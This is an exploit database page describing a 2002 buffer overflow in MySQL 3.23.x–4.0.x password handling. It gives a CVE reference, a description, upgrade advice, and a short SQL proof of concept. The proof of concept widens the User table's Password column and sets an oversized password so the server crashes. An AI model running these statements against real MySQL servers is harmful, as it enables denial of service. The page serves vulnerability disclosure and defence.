header-logo
Suggest Exploit
vendor:
MySQL
by:
SecurityFocus
7.5
CVSS
HIGH
MySQL Server Buffer Overflow Vulnerability
119
CWE
Product Name: MySQL
Affected Version From: MySQL 3.23.x
Affected Version To: MySQL 4.0.x
Patch Exists: YES
Related CWE: CVE-2002-1377
CPE: a:mysql:mysql
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2002

MySQL Server Buffer Overflow Vulnerability

MySQL server is prone to a buffer overflow vulnerability when handling user passwords of excessive size. A password greater than 16 characters may overrun the bounds of a reserved buffer in memory and corrupt adjacent memory. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server.

Mitigation:

Upgrade to the latest version of MySQL server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8590/info

MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size.

The issue presents itself, due to a lack of sufficient bounds checking performed when processing MySQL user passwords. A password greater that 16 characters may overrun the bounds of a reserved buffer in memory and corrupt adjacent memory. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server.

> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;

[Connection lost]

mysqld_safe/safe_mysqld log :

Navigation

Suggest Exploit

Services By CQR